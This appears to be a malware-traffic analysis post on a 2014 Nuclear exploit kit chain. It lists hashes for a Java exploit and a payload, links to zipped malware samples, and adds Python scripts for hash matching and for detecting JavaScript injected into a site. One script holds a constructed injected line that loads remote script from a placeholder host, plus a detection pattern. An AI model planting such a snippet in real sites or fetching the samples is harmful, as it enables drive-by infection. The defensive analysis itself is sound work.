2014-04-27 - NUCLEAR EK FROM 95.211.128.101 - BABYSERR.RU

ASSOCIATED FILES:

 

CHAIN OF EVENTS

ASSOCIATED DOMAINS:

TRAFFIC FROM COMPROMISED WEBSITE WITH MALICIOUS JAVASCRIPT:

REDIRECTS:

NUCLEAR EK:

POST-INFECTION CALLBACK:

 

PRELIMINARY MALWARE ANALYSIS

JAVA EXPLOIT

File name:  2014-04-27-Nuclear-EK-java-exploit.jar
File size:  13.0 KB ( 13317 bytes )
MD5 hash:  ca75e5cabe7f7b3b79204ca0c1e261a6
Detection ratio:  3 / 51
First submission:  2014-04-27 03:51:48 UTC
VirusTotal link:  https://www.virustotal.com/en/file/48ef7a7b737e1be53c0caa13d9f97648da3fa807f0eee560ea687d94accc9cd3/analysis/

 

MALWARE PAYLOAD

File name:  2014-04-27-Nuclear-EK-malware-payload.exe
File size:  71.4 KB ( 73064 bytes )
MD5 hash:  7209fa8fb92e878b84c0a0c71fd2622a
Detection ratio:  5 / 50
First submission:  2014-04-27 03:52:04 UTC
VirusTotal link:  https://www.virustotal.com/en/file/ee2ddb25183591dae8e3309b08592880699aa3484ae990f1f06e2c2e0bc93de3/analysis/
Malwr link:  https://malwr.com/submission/status/ZWFlZTQ2MDc0NTk2NDkxYWI5ZTU0MWIxMzM2Y2ViZTk/
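The indicator listing above gives a file size, an MD5, and (inside the VirusTotal URL) a SHA-256 for each artifact. The script below is an added example, not part of the original post: it parses that listing as written here into indicator records and checks a file against them on all three fields, since an MD5 match alone is weaker evidence than MD5 plus SHA-256 plus size. The indicator text embedded in the script is copied from this post; the bytes checked in the usage example are constructed and do not match either sample.

```python
import hashlib
import re
import sys

# Indicator listing copied verbatim from the PRELIMINARY MALWARE ANALYSIS
# section of this post. Any other text in this block is constructed.
INDICATOR_TEXT = """
JAVA EXPLOIT

File name:  2014-04-27-Nuclear-EK-java-exploit.jar
File size:  13.0 KB ( 13317 bytes )
MD5 hash:  ca75e5cabe7f7b3b79204ca0c1e261a6
Detection ratio:  3 / 51
VirusTotal link:  https://www.virustotal.com/en/file/48ef7a7b737e1be53c0caa13d9f97648da3fa807f0eee560ea687d94accc9cd3/analysis/

MALWARE PAYLOAD

File name:  2014-04-27-Nuclear-EK-malware-payload.exe
File size:  71.4 KB ( 73064 bytes )
MD5 hash:  7209fa8fb92e878b84c0a0c71fd2622a
Detection ratio:  5 / 50
VirusTotal link:  https://www.virustotal.com/en/file/ee2ddb25183591dae8e3309b08592880699aa3484ae990f1f06e2c2e0bc93de3/analysis/
"""


def parse_indicators(text):
    """Split the listing into one record per 'File name:' block.

    Each record carries the file name, exact byte size, MD5, and the SHA-256
    extracted from the VirusTotal URL (None if the block has no VT link).
    """
    starts = [m.start() for m in re.finditer(r"(?m)^File name:", text)]
    records = []
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(text)
        chunk = text[start:end]
        name = re.search(r"^File name:\s+(\S+)", chunk, re.M).group(1)
        size = int(re.search(r"\(\s*(\d+)\s*bytes\s*\)", chunk).group(1))
        md5 = re.search(r"^MD5 hash:\s+([0-9a-fA-F]{32})", chunk, re.M).group(1).lower()
        sha = re.search(r"virustotal\.com/\S*?/file/([0-9a-fA-F]{64})/", chunk)
        records.append({
            "name": name,
            "size": size,
            "md5": md5,
            "sha256": sha.group(1).lower() if sha else None,
        })
    return records


def match_indicator(data, records):
    """Return the record whose size, MD5 and SHA-256 all match `data`, else None.

    A size or MD5 match on its own is reported as a partial hit so the analyst
    can look closer, but only a full match is returned.
    """
    md5 = hashlib.md5(data).hexdigest()
    sha256 = hashlib.sha256(data).hexdigest()
    for rec in records:
        size_ok = rec["size"] == len(data)
        md5_ok = rec["md5"] == md5
        sha_ok = rec["sha256"] is None or rec["sha256"] == sha256
        if size_ok and md5_ok and sha_ok:
            return rec
        if md5_ok or sha_ok and rec["sha256"] is not None:
            print(f"partial hit on {rec['name']}: size={size_ok} md5={md5_ok} sha256={sha_ok}",
                  file=sys.stderr)
    return None


if __name__ == "__main__":
    recs = parse_indicators(INDICATOR_TEXT)
    paths = sys.argv[1:]
    if not paths:
        # Constructed sample bytes; they are not either artifact from the post.
        hit = match_indicator(b"not the Nuclear EK payload", recs)
        print("constructed sample matched:", hit)
    for path in paths:
        with open(path, "rb") as fh:
            hit = match_indicator(fh.read(), recs)
        print(f"{path}: {hit['name'] if hit else 'no match'}")
```

Run it with the extracted .jar or .exe from the associated ZIP as an argument to confirm the artifacts match the hashes published here; with no arguments it only checks the constructed sample.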

 

SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)

 

HIGHLIGHTS FROM THE TRAFFIC

JavaScript pointing to the redirect appears throughout the traffic to the compromised website.  First, it appears in an .htaccess redirect served to visitors arriving from a search engine result:

 

Twice in the HTML for the main page:

 

This malicious JavaScript was also appended to the end of every JavaScript file requested from the website, so every page that loads one of the site's own scripts also loads the redirect.  Here's one example:

 
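The injection pattern here, the same snippet tacked onto the tail of every script the site serves, is easy to confirm once you have a known-good copy of the site (a git checkout, a backup, or the vendor package for a CMS). The script below is an added example, not from the original post: it compares a deployed JavaScript file with its clean baseline, isolates anything appended after the clean content, and flags a suffix that looks like a redirect (document.write, script or iframe tags, a remote src). The clean and infected file contents, including the injected snippet and its hostname, are constructed for the example; the real snippet from this capture appears only in the post's screenshots.

```python
import re

# Constructed sample files. CLEAN_JS stands in for a site's own script and
# INFECTED_JS is that same file after something appended a redirect to it.
# The hostname is a placeholder and is not from the capture described in the post.
CLEAN_JS = "(function () {\n  /* site code */\n  window.site = { ready: true };\n})();\n"
INJECTED_SNIPPET = (
    "document.write('<script src=\"http://redirector.invalid/x.js\"></script>');"
)
INFECTED_JS = CLEAN_JS + INJECTED_SNIPPET + "\n"

# Markers typical of appended redirect code. Tune per site; a legitimate build
# step that appends a sourcemap comment would not match these.
SUSPECT_RE = re.compile(
    r"document\.write|<script|<iframe|\.src\s*=\s*['\"]https?://|eval\(|unescape\(",
    re.I,
)


def appended_suffix(baseline, current):
    """Return what was appended to `baseline` to produce `current`.

    '' means the files are identical; None means `current` differs somewhere
    other than the tail (edited in place, or a different file altogether).
    """
    if current.startswith(baseline):
        return current[len(baseline):]
    return None


def classify(baseline, current):
    """Label a deployed file relative to its clean baseline."""
    suffix = appended_suffix(baseline, current)
    if suffix is None:
        return "modified"
    if suffix.strip() == "":
        return "clean"
    if SUSPECT_RE.search(suffix):
        return "appended-suspicious"
    return "appended"


def scan(pairs):
    """Classify (path, baseline_text, current_text) triples into a report list."""
    report = []
    for path, baseline, current in pairs:
        verdict = classify(baseline, current)
        suffix = appended_suffix(baseline, current)
        report.append((path, verdict, (suffix or "").strip()[:120]))
    return report


if __name__ == "__main__":
    # Constructed inputs; on a real site, read the baseline from the clean copy
    # and the current text from the deployed webroot for every .js file.
    for path, verdict, tail in scan([
        ("js/site.js", CLEAN_JS, CLEAN_JS),
        ("js/jquery.js", CLEAN_JS, INFECTED_JS),
        ("js/other.js", CLEAN_JS, "// header\n" + CLEAN_JS),
    ]):
        print(f"{path}: {verdict}" + (f"  tail: {tail}" if tail else ""))
```

Anything reported as "appended-suspicious" is a candidate for the injected redirect; "modified" files need a line diff rather than a tail check, since an attacker who edits the middle of a file (or the .htaccess rules, as in this capture) will not be caught by suffix comparison alone.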

The redirect pointing to Nuclear EK:

 

Nuclear EK sends the Java exploit:

 

Java exploit delivers the malware:

 

HTTP headers for the post-infection callback look somewhat corrupt:

 

FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
